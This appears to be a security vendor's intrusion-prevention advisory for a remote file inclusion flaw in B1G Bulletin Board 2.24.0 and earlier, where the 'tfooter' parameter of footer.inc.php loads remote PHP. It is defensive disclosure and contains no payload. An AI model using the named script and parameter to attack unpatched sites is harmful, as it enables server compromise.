B1GBB.Footer.Inc.PHP.File.Inclusion
Description
B1G Bulletin Board (b1gBB) has a remote file include vulnerability. A remote attacker could execute arbitrary script code on the web server with the privileges of the server. This can be done via a specially crafted URL request to the 'footer.inc.php' script, using the 'tfooter' parameter to specify a malicious PHP file from a remote system.
Affected Products
B1G Bulletin Board (b1gBB) version 2.24.0 and prior.
Impact
System compromise, remote script execution.
Recommended Actions
Currently we are not aware of any officially supplied fix for this issue.
Telemetry
Coverage
IPS (Regular DB) | |
IPS (Extended DB) |